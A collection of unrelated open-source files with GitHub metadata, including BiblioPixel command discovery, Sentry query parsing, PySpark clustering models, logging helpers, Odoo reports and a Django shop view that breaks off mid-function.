"ref": "refs/heads/develop",
"path": "assopy/templatetags/assopy_tags.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "ASP",
"bytes": "1490"
},
{
"name": "CSS",
"bytes": "4751434"
},
{
"name": "HTML",
"bytes": "2177936"
},
{
"name": "JavaScript",
"bytes": "3465605"
},
{
"name": "Makefile",
"bytes": "3338"
},
{
"name": "PHP",
"bytes": "4506"
},
{
"name": "Python",
"bytes": "1255065"
},
{
"name": "Ruby",
"bytes": "1870"
},
{
"name": "Shell",
"bytes": "1679"
},
{
"name": "XSLT",
"bytes": "5122"
}
],
"symlink_target": ""
}
|
import os, pathlib
# Discover the command modules that live alongside this package.
DIR = os.listdir(str(pathlib.Path(__file__).parent))
# Every non-private .py file is a user-facing command, minus the extension.
COMMANDS = [name[:-3] for name in DIR
            if name.endswith('.py') and not name.startswith('_')]
# Split the command list into two display rows (first row holds up to eight).
_ROW = 8
COMMANDS_LINES = COMMANDS[:_ROW], COMMANDS[_ROW:]
COMMANDS_PRINTABLE = '\n'.join(', '.join(row) for row in COMMANDS_LINES)
|
{
"content_hash": "37f5dbf15dcb46d93c42657df96d5cb1",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 79,
"avg_line_length": 44.5,
"alnum_prop": 0.6666666666666666,
"repo_name": "ManiacalLabs/BiblioPixel",
"id": "0704a5087d9a7db2c3bc4478542f228ee78e9a0c",
"size": "267",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "bibliopixel/commands/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "20651"
},
{
"name": "HTML",
"bytes": "3310"
},
{
"name": "JavaScript",
"bytes": "5140"
},
{
"name": "Python",
"bytes": "674175"
},
{
"name": "Shell",
"bytes": "2973"
}
],
"symlink_target": ""
}
|
"""
MINDBODY Public API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class StoredCardInfo(object):
    """Swagger model for a stored payment card.

    NOTE: originally generated by the swagger code generator; only the last
    four digits of the card are exposed by the API.
    """

    # Maps attribute name -> attribute type.
    swagger_types = {
        'last_four': 'str'
    }
    # Maps attribute name -> JSON key in the API definition.
    attribute_map = {
        'last_four': 'LastFour'
    }

    def __init__(self, last_four=None):  # noqa: E501
        """StoredCardInfo - a model defined in Swagger"""  # noqa: E501
        self._last_four = None
        self.discriminator = None
        if last_four is not None:
            self.last_four = last_four

    @property
    def last_four(self):
        """The last four digits of the stored card.

        :rtype: str
        """
        return self._last_four

    @last_four.setter
    def last_four(self, last_four):
        """Set the last four digits of the stored card.

        :type: str
        """
        self._last_four = last_four

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            # Serialize one level deep: nested models expose to_dict().
            if isinstance(value, list):
                result[attr] = [item.to_dict() if hasattr(item, "to_dict")
                                else item for item in value]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {k: (v.to_dict() if hasattr(v, "to_dict") else v)
                                for k, v in value.items()}
            else:
                result[attr] = value
        if issubclass(StoredCardInfo, dict):
            for key, value in self.items():
                result[key] = value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        return (isinstance(other, StoredCardInfo) and
                self.__dict__ == other.__dict__)

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
{
"content_hash": "4ade070d0ba30003a145c0484a2a9cb6",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 119,
"avg_line_length": 27.646017699115045,
"alnum_prop": 0.5425736235595391,
"repo_name": "mindbody/API-Examples",
"id": "312ede49252f57eaf3a549554118995af2e0a4f5",
"size": "3141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SDKs/Python/swagger_client/models/stored_card_info.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "PHP",
"bytes": "3610259"
},
{
"name": "Python",
"bytes": "2338642"
},
{
"name": "Ruby",
"bytes": "2284441"
},
{
"name": "Shell",
"bytes": "5058"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function
from sentry.constants import STATUS_CHOICES
from sentry.models import EventUser, User
from sentry.utils.auth import find_users
def get_user_tag(project, key, value):
    """Resolve a user search term to the matching EventUser tag value.

    Falls back to the literal ``key:value`` string when no matching
    EventUser row exists.
    """
    # Map the public search keys onto EventUser column names; any other
    # key is assumed to already be a column name.
    field_by_key = {'id': 'ident', 'ip': 'ip_address'}
    lookup = field_by_key.get(key, key)

    # TODO(dcramer): do something with case of multiple matches
    matches = EventUser.objects.filter(project=project, **{lookup: value})
    try:
        euser = matches[0]
    except IndexError:
        return '{}:{}'.format(key, value)
    return euser.tag_value
def parse_query(project, query, user):
    """Parse a search query string into structured filters.

    Splits *query* on spaces. Plain tokens accumulate into the free-text
    ``results['query']`` string; ``key:value`` tokens become filters.
    Double-quoted values may span several tokens and are re-joined.

    Recognized keys:
      - ``is``: mapped through STATUS_CHOICES into ``results['status']``
      - ``assigned``: resolved to a user (``me`` -> *user*)
      - ``first-release`` / ``release``
      - ``user`` / ``user.<field>``: resolved via get_user_tag
      - anything else: stored verbatim in ``results['tags']``

    :param project: project used to resolve user tags
    :param query: raw query string
    :param user: the requesting user (for ``assigned:me``)
    :return: dict with ``tags`` (dict) and ``query`` (str) keys, plus
        optional ``status``, ``assigned_to``, ``first_release`` keys.
    """
    # TODO(dcramer): handle query being wrapped in quotes
    tokens = query.split(' ')

    results = {'tags': {}, 'query': []}

    tokens_iter = iter(tokens)
    for token in tokens_iter:
        # ignore empty tokens
        if not token:
            continue

        if ':' not in token:
            results['query'].append(token)
            continue

        key, value = token.split(':', 1)
        if not value:
            results['query'].append(token)
            continue

        if value[0] == '"':
            # Quoted value: keep consuming tokens until the closing quote
            # (or the end of input) and re-join them with single spaces.
            nvalue = value
            while nvalue[-1] != '"':
                try:
                    # BUGFIX: use the builtin next() instead of the
                    # Python 2-only iterator method .next(), so this
                    # also runs on Python 3.
                    nvalue = next(tokens_iter)
                except StopIteration:
                    break
                value = '%s %s' % (value, nvalue)

            if value.endswith('"'):
                value = value[1:-1]
            else:
                value = value[1:]

        if key == 'is':
            try:
                results['status'] = STATUS_CHOICES[value]
            except KeyError:
                # Unknown status values are silently ignored.
                pass
        elif key == 'assigned':
            if value == 'me':
                results['assigned_to'] = user
            else:
                try:
                    results['assigned_to'] = find_users(value)[0]
                except IndexError:
                    # XXX(dcramer): hacky way to avoid showing any results when
                    # an invalid user is entered
                    results['assigned_to'] = User(id=0)
        elif key == 'first-release':
            results['first_release'] = value
        elif key == 'release':
            results['tags']['sentry:release'] = value
        elif key == 'user':
            if ':' in value:
                comp, value = value.split(':', 1)
            else:
                comp = 'id'
            results['tags']['sentry:user'] = get_user_tag(
                project, comp, value)
        elif key.startswith('user.'):
            results['tags']['sentry:user'] = get_user_tag(
                project, key.split('.', 1)[1], value)
        else:
            results['tags'][key] = value

    results['query'] = ' '.join(results['query'])

    return results
|
{
"content_hash": "60d6346dbe398c53aae0c94bba276c09",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 79,
"avg_line_length": 29.36082474226804,
"alnum_prop": 0.488061797752809,
"repo_name": "Natim/sentry",
"id": "488af414c1460370ec4f28306c8ce7d6780385ac",
"size": "2848",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/sentry/search/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "160813"
},
{
"name": "HTML",
"bytes": "193981"
},
{
"name": "JavaScript",
"bytes": "417570"
},
{
"name": "Makefile",
"bytes": "2832"
},
{
"name": "Python",
"bytes": "6877708"
}
],
"symlink_target": ""
}
|
# Demo: importing and using a user-defined module.
import mymodule

# Call a function exported by the module, then read its module-level
# __version__ attribute.
mymodule.sayhi()
print('Version:', mymodule.__version__)
|
{
"content_hash": "6132cbed532fb2794caaaafd9f4c20f9",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 39,
"avg_line_length": 24.333333333333332,
"alnum_prop": 0.7397260273972602,
"repo_name": "louistin/thinkstation",
"id": "e01910fdfd52f18ee0b88f03c8fae323e68bbf19",
"size": "93",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "a_byte_of_python/unit_9_module/mymodule_demo.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2640"
},
{
"name": "C++",
"bytes": "21715"
},
{
"name": "GCC Machine Description",
"bytes": "559"
},
{
"name": "Go",
"bytes": "3714"
},
{
"name": "Python",
"bytes": "26890"
}
],
"symlink_target": ""
}
|
from setuptools import setup, find_packages
from docs import getVersion
# Variables ===================================================================
# Read the metadata files with context managers so the file handles are
# closed promptly instead of leaking until garbage collection.
with open('CHANGELOG.rst') as changelog_file:
    changelog = changelog_file.read()

with open('README.rst') as readme_file:
    readme = readme_file.read()

# README first, changelog appended below it.
long_description = "\n\n".join([
    readme,
    changelog,
])

with open("requirements.txt") as requirements_file:
    requirements = requirements_file.read().splitlines()

# Actual setup definition =====================================================
setup(
    name='edeposit.amqp.aleph_link_export',
    version=getVersion(changelog),
    description="Subsystem for updating Edeposit's links in Aleph.",
    long_description=long_description,
    url='https://github.com/edeposit/edeposit.amqp.aleph_link_export/',

    author='Edeposit team',
    author_email='edeposit@email.cz',

    classifiers=[
        "Development Status :: 3 - Alpha",
        'Intended Audience :: Developers',

        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 2.7",

        "License :: OSI Approved :: MIT License",
    ],
    license='MIT',

    packages=find_packages('src'),
    package_dir={'': 'src'},

    namespace_packages=['edeposit', 'edeposit.amqp'],
    zip_safe=False,
    include_package_data=True,
    install_requires=requirements,

    test_suite='py.test',
    tests_require=["pytest"],
    extras_require={
        "test": [
            "pytest",
        ],
        "docs": [
            "sphinx",
            "sphinxcontrib-napoleon",
        ]
    },
)
|
{
"content_hash": "82a3ec6c36c72d27866f9c350e8c6d35",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 79,
"avg_line_length": 26.555555555555557,
"alnum_prop": 0.5578800557880056,
"repo_name": "edeposit/edeposit.amqp.aleph_link_export",
"id": "acca6549f19a77363b62b7d8867aa389c6c2e2cb",
"size": "1599",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34956"
},
{
"name": "Shell",
"bytes": "167"
}
],
"symlink_target": ""
}
|
import price
import workcenter_load
import order
import bom_structure
import mrp_report
import mrp_production_order
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
{
"content_hash": "4afd08f735ac5fe874ce9c4d05efef89",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 65,
"avg_line_length": 20.444444444444443,
"alnum_prop": 0.8315217391304348,
"repo_name": "chjw8016/GreenOdoo7-haibao",
"id": "471e3440af3c7891cb8d7d440f86c04ddeab1f65",
"size": "1163",
"binary": false,
"copies": "67",
"ref": "refs/heads/master",
"path": "openerp/addons/mrp/report/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "90846"
},
{
"name": "CSS",
"bytes": "384369"
},
{
"name": "JavaScript",
"bytes": "1730589"
},
{
"name": "PHP",
"bytes": "14033"
},
{
"name": "Python",
"bytes": "9394626"
},
{
"name": "Shell",
"bytes": "5172"
},
{
"name": "XSLT",
"bytes": "156761"
}
],
"symlink_target": ""
}
|
"""Network package exceptions."""
__version__ = '$Revision: #2 $'
class Error(Exception):
    """Base exception for all network package exceptions."""

    def __str__(self):
        # Delegate to repr() so subclasses only need to override __repr__.
        return repr(self)
class IPValidationError(Error):
    """IP address is invalid.

    :IVariables:
        - `address`: The address that is invalid. In some circumstances
          this may be a string and in others it may be an integer.
    """

    def __init__(self, address):
        super(IPValidationError, self).__init__()
        self.address = address

    def __repr__(self):
        return '<IPValidationError {0}>'.format(self.address)
class MaskValidationError(Error):
    """Mask is invalid.

    :IVariables:
        - `mask`: The mask that is invalid. In some circumstances this
          may be a string and in others it may be an integer.
    """

    def __init__(self, mask):
        super(MaskValidationError, self).__init__()
        self.mask = mask

    def __repr__(self):
        return '<MaskValidationError {0}>'.format(self.mask)
|
{
"content_hash": "626cd8050ff8a802fb9fe3320259a10a",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 77,
"avg_line_length": 24.071428571428573,
"alnum_prop": 0.592482690405539,
"repo_name": "ironport/aplib",
"id": "60301f497d3369df4c806b7518635ef25e2cc323",
"size": "2202",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aplib/net/exceptions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5341"
},
{
"name": "Python",
"bytes": "292622"
}
],
"symlink_target": ""
}
|
from numpy import array
from pyspark import RDD
from pyspark import SparkContext
from pyspark.mllib.common import callMLlibFunc, callJavaFunc
from pyspark.mllib.linalg import DenseVector, SparseVector, _convert_to_vector
from pyspark.mllib.stat.distribution import MultivariateGaussian
__all__ = ['KMeansModel', 'KMeans', 'GaussianMixtureModel', 'GaussianMixture']
class KMeansModel(object):

    """A clustering model derived from the k-means method.

    >>> data = array([0.0,0.0, 1.0,1.0, 9.0,8.0, 8.0,9.0]).reshape(4, 2)
    >>> model = KMeans.train(
    ...     sc.parallelize(data), 2, maxIterations=10, runs=30, initializationMode="random")
    >>> model.predict(array([0.0, 0.0])) == model.predict(array([1.0, 1.0]))
    True
    >>> model.predict(array([8.0, 9.0])) == model.predict(array([9.0, 8.0]))
    True
    >>> model = KMeans.train(sc.parallelize(data), 2)
    >>> sparse_data = [
    ...     SparseVector(3, {1: 1.0}),
    ...     SparseVector(3, {1: 1.1}),
    ...     SparseVector(3, {2: 1.0}),
    ...     SparseVector(3, {2: 1.1})
    ... ]
    >>> model = KMeans.train(sc.parallelize(sparse_data), 2, initializationMode="k-means||")
    >>> model.predict(array([0., 1., 0.])) == model.predict(array([0, 1.1, 0.]))
    True
    >>> model.predict(array([0., 0., 1.])) == model.predict(array([0, 0, 1.1]))
    True
    >>> model.predict(sparse_data[0]) == model.predict(sparse_data[1])
    True
    >>> model.predict(sparse_data[2]) == model.predict(sparse_data[3])
    True
    >>> type(model.clusterCenters)
    <type 'list'>
    """

    def __init__(self, centers):
        self.centers = centers

    @property
    def clusterCenters(self):
        """Get the cluster centers, represented as a list of NumPy arrays."""
        return self.centers

    def predict(self, x):
        """Find the cluster to which x belongs in this model.

        :param x: a single data point (converted via _convert_to_vector)
        :return: index of the closest cluster center (ties keep the
            lowest index)
        """
        best = 0
        best_distance = float("inf")
        x = _convert_to_vector(x)
        # IMPROVED: enumerate() instead of `for i in xrange(len(...))` --
        # clearer, and works unchanged on Python 3 where xrange is gone.
        for i, center in enumerate(self.centers):
            distance = x.squared_distance(center)
            if distance < best_distance:
                best = i
                best_distance = distance
        return best
class KMeans(object):

    @classmethod
    def train(cls, rdd, k, maxIterations=100, runs=1, initializationMode="k-means||", seed=None):
        """Train a k-means clustering model."""
        vectors = rdd.map(_convert_to_vector)
        java_model = callMLlibFunc("trainKMeansModel", vectors, k, maxIterations,
                                   runs, initializationMode, seed)
        raw_centers = callJavaFunc(rdd.context, java_model.clusterCenters)
        # Materialize each JVM-side center as a NumPy array.
        return KMeansModel([center.toArray() for center in raw_centers])
class GaussianMixtureModel(object):

    """A clustering model derived from the Gaussian Mixture Model method.

    >>> clusterdata_1 =  sc.parallelize(array([-0.1,-0.05,-0.01,-0.1,
    ...                                         0.9,0.8,0.75,0.935,
    ...                                        -0.83,-0.68,-0.91,-0.76 ]).reshape(6, 2))
    >>> model = GaussianMixture.train(clusterdata_1, 3, convergenceTol=0.0001,
    ...                                 maxIterations=50, seed=10)
    >>> labels = model.predict(clusterdata_1).collect()
    >>> labels[0]==labels[1]
    False
    >>> labels[1]==labels[2]
    True
    >>> labels[4]==labels[5]
    True
    >>> clusterdata_2 =  sc.parallelize(array([-5.1971, -2.5359, -3.8220,
    ...                                        -5.2211, -5.0602,  4.7118,
    ...                                         6.8989, 3.4592,  4.6322,
    ...                                         5.7048,  4.6567, 5.5026,
    ...                                         4.5605,  5.2043,  6.2734]).reshape(5, 3))
    >>> model = GaussianMixture.train(clusterdata_2, 2, convergenceTol=0.0001,
    ...                               maxIterations=150, seed=10)
    >>> labels = model.predict(clusterdata_2).collect()
    >>> labels[0]==labels[1]==labels[2]
    True
    >>> labels[3]==labels[4]
    True
    """

    def __init__(self, weights, gaussians):
        self.weights = weights
        self.gaussians = gaussians
        self.k = len(self.weights)

    def predict(self, x):
        """
        Find the cluster to which the points in 'x' has maximum membership
        in this model.

        :param x: RDD of data points.
        :return: cluster_labels. RDD of cluster labels.
        """
        if isinstance(x, RDD):
            # The hard label is the index of the strongest soft membership.
            memberships = self.predictSoft(x)
            return memberships.map(lambda z: z.index(max(z)))

    def predictSoft(self, x):
        """
        Find the membership of each point in 'x' to all mixture components.

        :param x: RDD of data points.
        :return: membership_matrix. RDD of array of double values.
        """
        if isinstance(x, RDD):
            means, sigmas = zip(*[(g.mu, g.sigma) for g in self.gaussians])
            return callMLlibFunc("predictSoftGMM", x.map(_convert_to_vector),
                                 self.weights, means, sigmas)
class GaussianMixture(object):
    """
    Learning algorithm for Gaussian Mixtures using the expectation-maximization algorithm.

    :param data: RDD of data points
    :param k: Number of components
    :param convergenceTol: Threshold value to check the convergence criteria. Defaults to 1e-3
    :param maxIterations: Number of iterations. Default to 100
    :param seed: Random Seed
    """

    @classmethod
    def train(cls, rdd, k, convergenceTol=1e-3, maxIterations=100, seed=None):
        """Train a Gaussian Mixture clustering model."""
        weights, means, sigmas = callMLlibFunc("trainGaussianMixture",
                                               rdd.map(_convert_to_vector), k,
                                               convergenceTol, maxIterations, seed)
        # Pair each component's mean with its covariance matrix.
        gaussians = [MultivariateGaussian(means[i], sigmas[i]) for i in range(k)]
        return GaussianMixtureModel(weights, gaussians)
def _test():
    """Run this module's doctests against a local SparkContext."""
    import doctest
    test_globals = globals().copy()
    # Doctests in this module reference an `sc` fixture.
    test_globals['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
    failures, _ = doctest.testmod(globs=test_globals, optionflags=doctest.ELLIPSIS)
    test_globals['sc'].stop()
    if failures:
        exit(-1)


if __name__ == "__main__":
    _test()
|
{
"content_hash": "2e1358fb032644196d7de46fad84cd9f",
"timestamp": "",
"source": "github",
"line_count": 167,
"max_line_length": 97,
"avg_line_length": 38.10179640718563,
"alnum_prop": 0.5662423385195663,
"repo_name": "trueyao/spark-lever",
"id": "949db5705abd7ce8aa7f7b958bf7e48c809a19b1",
"size": "7148",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/pyspark/mllib/clustering.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "35774"
},
{
"name": "CSS",
"bytes": "4512"
},
{
"name": "Java",
"bytes": "787105"
},
{
"name": "JavaScript",
"bytes": "21537"
},
{
"name": "Makefile",
"bytes": "6840"
},
{
"name": "Python",
"bytes": "924210"
},
{
"name": "Roff",
"bytes": "5379"
},
{
"name": "SQLPL",
"bytes": "3603"
},
{
"name": "Scala",
"bytes": "9252639"
},
{
"name": "Shell",
"bytes": "141187"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from .models import Recipient
class RecipientsMixin(object):
    """
    A mixin for sending the results to a list of recipients.
    """

    def get_recipients(self):
        recipients = Recipient.objects.all().select_related('user')
        emails = [recipient.user.email for recipient in recipients
                  if recipient.user.email]
        if emails:
            return emails
        # No configured recipients with an email: fall back to the
        # addresses of the site managers.
        return [manager_tuple[1] for manager_tuple in settings.MANAGERS]

    recipient_list = get_recipients
|
{
"content_hash": "dd813ad8c5f4cb794992a6e35cb84321",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 65,
"avg_line_length": 31.5625,
"alnum_prop": 0.6495049504950495,
"repo_name": "bennylope/django-contact-recipients",
"id": "09bac8d0029f825a01e3999f8bbe3277eb7e6014",
"size": "505",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contact_recipients/mixins.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "7867"
}
],
"symlink_target": ""
}
|
"""Logging Module.
This module handles logging to the standard python logging subsystem and to the
console.
"""
from __future__ import absolute_import
import logging
import os
import sys
LOG = logging.getLogger(__name__)
class DebugFormatter(logging.Formatter):
    """Log formatter.

    Outputs any 'data' values passed in the 'extra' parameter if provided.

    **Example**:

    .. code-block:: python

        LOG.debug("My message", extra={'data': locals()})
    """

    def format(self, record):
        """Print out any 'extra' data provided in logs."""
        formatted = logging.Formatter.format(self, record)
        if not hasattr(record, 'data'):
            return formatted
        # Append the extra payload after the normally formatted message.
        return "%s. DEBUG DATA=%s" % (formatted, record.__dict__['data'])
def init_logging(config, default_config=None):
    """Configure logging based on log config file.

    Turn on console logging if no logging files found

    :param config: object with configuration namespace (ex. argparse parser)
    :keyword default_config: path to a python logging configuration file
    """
    # BUGFIX: `logging.config` is a submodule that `import logging` does
    # NOT import; without this explicit import, the fileConfig() calls
    # below raise AttributeError.
    import logging.config

    if config.get('logconfig') and os.path.isfile(config.get('logconfig')):
        logging.config.fileConfig(config['logconfig'],
                                  disable_existing_loggers=False)
    elif default_config and os.path.isfile(default_config):
        logging.config.fileConfig(default_config,
                                  disable_existing_loggers=False)
    else:
        init_console_logging(config)
def find_console_handler(logger):
    """Return a stream handler, if it exists."""
    for candidate in logger.handlers:
        streams_to_stderr = (isinstance(candidate, logging.StreamHandler) and
                             candidate.stream == sys.stderr)
        if streams_to_stderr:
            return candidate
    # Implicitly returns None when no stderr stream handler is attached.
def log_level(config):
    """Get debug settings from configuration.

    --debug: turn on additional debug code/inspection (implies
             logging.DEBUG)
    --verbose: turn up logging output (logging.DEBUG)
    --quiet: turn down logging output (logging.WARNING)

    default is logging.INFO

    :param config: object with configuration namespace (ex. argparse parser)
    """
    # debug and verbose both map to DEBUG; debug additionally implies
    # extra inspection elsewhere (see get_debug_formatter).
    if config.get('debug') is True or config.get('verbose') is True:
        return logging.DEBUG
    if config.get('quiet') is True:
        return logging.WARNING
    return logging.INFO
def get_debug_formatter(config):
    """Get debug formatter based on configuration.

    :param config: configuration namespace (ex. argparser)

    --debug: log line numbers and file data also
    --verbose: standard debug
    --quiet: turn down logging output (logging.WARNING)

    default is logging.INFO

    :param config: object with configuration namespace (ex. argparse parser)
    """
    if config.get('debug') is True:
        return DebugFormatter('%(pathname)s:%(lineno)d: %(levelname)-8s '
                              '%(message)s')
    if config.get('verbose') is True:
        return logging.Formatter(
            '%(name)-30s: %(levelname)-8s %(message)s')
    # quiet and the default case both use a bare message-only format.
    return logging.Formatter('%(message)s')
def init_console_logging(config):
    """Enable logging to the console.

    :param config: object with configuration namespace (ex. argparse parser)
    """
    root = logging.getLogger()
    # Reuse an already-attached stderr handler when one exists, so repeated
    # initialization does not duplicate console output.
    console = find_console_handler(root)
    if not console:
        console = logging.StreamHandler()

    logging_level = log_level(config)
    console.setLevel(logging_level)
    # Simpler console-oriented format chosen by verbosity settings.
    console.setFormatter(get_debug_formatter(config))
    root.addHandler(console)
    root.setLevel(logging_level)

    global LOG  # pylint: disable=W0603
    LOG = logging.getLogger(__name__)  # reset
|
{
"content_hash": "36b08933ba59bbdd40254a052a18bcdc",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 79,
"avg_line_length": 31.71875,
"alnum_prop": 0.6517241379310345,
"repo_name": "mgeisler/satori",
"id": "7600290ab7b05c7747a81e3812f65107ebfe7986",
"size": "4625",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "satori/common/logging.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "4788"
},
{
"name": "Python",
"bytes": "220026"
},
{
"name": "Shell",
"bytes": "1111"
}
],
"symlink_target": ""
}
|
import cbox
@cbox.stream()
# we can pass default values and use type annotations for correct types
def nth_item(line, n: int = 0):
    """returns the nth item from each line.
    :param n: the number of item position starting from 0
    """
    # NOTE(review): cbox appears to derive the CLI option, its int type, and
    # the help text from this signature/docstring -- confirm before editing.
    # Raises IndexError when the line has fewer than n+1 whitespace-separated
    # items.
    return line.split()[n]


if __name__ == '__main__':
    # Run the stream processor as a command-line tool.
    cbox.main(nth_item)
|
{
"content_hash": "3a24fc5896d8b0040fdc78630dff6260",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 71,
"avg_line_length": 21.6,
"alnum_prop": 0.6450617283950617,
"repo_name": "shmuelamar/cbox",
"id": "e3db4a9e781eb37d2c02cfddaa66a7c5677e6783",
"size": "347",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/nth-item.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1324"
},
{
"name": "Python",
"bytes": "33379"
}
],
"symlink_target": ""
}
|
from energy_demand import model
|
{
"content_hash": "7b644434a23c0a1c1f0b2aa231e6cbe4",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 31,
"avg_line_length": 31,
"alnum_prop": 0.8709677419354839,
"repo_name": "nismod/energy_demand",
"id": "9009659fc41ac80a80410a340cf63b3a6419c9ab",
"size": "31",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_energy_model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1432899"
},
{
"name": "Shell",
"bytes": "2063"
}
],
"symlink_target": ""
}
|
import models
import permissions
def ensure(app):
    """Idempotently seed the database with a demo user, post, and permission.

    Creates user #1 and post #1 if they do not exist, then grants the user
    'read' permission on the post on a best-effort basis.

    :param app: application object whose ``app_context()`` provides the
        database session.
    """
    with app.app_context():
        user = models.db.session.query(models.User).get(1)
        if not user:
            user = models.User(id=1, username='freddie')
            models.db.session.add(user)
            models.db.session.commit()
        post = models.db.session.query(models.Post).get(1)
        if not post:
            post = models.Post(id=1, title='death on two legs', content='dedicated to...')
            models.db.session.add(post)
            models.db.session.commit()
        try:
            permissions.manager.ensure_permission(user, post, 'read')
        except Exception:
            # BUGFIX: was a bare `except:`, which also swallowed
            # SystemExit/KeyboardInterrupt. Exception keeps the original
            # best-effort intent (presumably the permission may already
            # exist -- TODO confirm) without trapping interpreter exits.
            pass
        models.db.session.commit()
|
{
"content_hash": "d43c94f0c18a7a26440c29eee72170cb",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 90,
"avg_line_length": 33.19047619047619,
"alnum_prop": 0.5796269727403156,
"repo_name": "jmcarp/guardrail",
"id": "2972c7f0a7b47331990f2b79582c7fb15933cd1e",
"size": "722",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/flask_sqla/fixtures.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "55757"
}
],
"symlink_target": ""
}
|
from openerp import api, models
class ReportSession(models.AbstractModel):
    """Report parser supplying rendering values for the
    ``openacademy.report_session_view`` template.
    """
    _name = "report.openacademy.report_session_view"

    @api.multi
    def _get_report_values(self, docids, data=None):
        """Return the rendering context for the session report template.

        :param docids: ids of the ``openacademy.session`` records to print
        :param data: optional extra data passed by the report action
        :return: dict of values consumed by the template
        """
        # IMPROVED: removed the large commented-out legacy implementation
        # that previously shadowed this body.
        docs = self.env['openacademy.session'].browse(docids)
        return {
            'doc_ids': docs.ids,
            'doc_model': 'openacademy.session',
            'docs': docs,
            'other_variable': 'other value',
        }
|
{
"content_hash": "12e7dde19c7a54dc4f7908b19482772e",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 81,
"avg_line_length": 36.166666666666664,
"alnum_prop": 0.5737327188940092,
"repo_name": "vauxoo-dev/openacademy-project",
"id": "c36712be6bd843616cc08b94c5c59b4c2ac8ce4a",
"size": "991",
"binary": false,
"copies": "1",
"ref": "refs/heads/odoo_ctp_2017",
"path": "openacademy/report.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "15227"
}
],
"symlink_target": ""
}
|
from django.shortcuts import render, render_to_response, redirect
from django.http import HttpResponseRedirect, HttpResponse, HttpRequest
#from django.contrib.auth import authenticate, login as auth_login
from social_auth.models import UserSocialAuth
from play.models import *
from charity.models import *
from shop.models import *
from play.utils import *
from django.utils import simplejson
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth import authenticate,login as auth_login
from django.contrib.auth.models import User
import json
from django.contrib.auth import logout as django_logout
from shop.forms import *
from django.core.exceptions import *
from datetime import datetime
from datetime import datetime
from shop.utils import *
from play.constants import CITY
def home(request, city_name=CITY):
    """Render the shop owner's dashboard, or redirect to login/sorry."""
    if not request.user.is_authenticated():
        return HttpResponseRedirect('/login/')
    user = request.user
    player = Player.objects.get(user=user)
    pictureUrl(user, player)
    organization, shop = getShop(user)
    try:
        # NOTE(review): the shop from getShop() is immediately re-fetched
        # here -- looks redundant; verify before simplifying.
        shop = Shop.objects.get(user=user)
        createEvent(request, shop)
    except ObjectDoesNotExist:
        return HttpResponseRedirect('/sorry/')
    return render(request, 'shop/home.html', {'user': user,
                                              'player': player,
                                              'shop': shop})
def company(request, city_name=CITY):
    """Show the company page; on POST, update the shop title/location."""
    if not request.user.is_authenticated():
        return HttpResponseRedirect('/login/')
    user = request.user
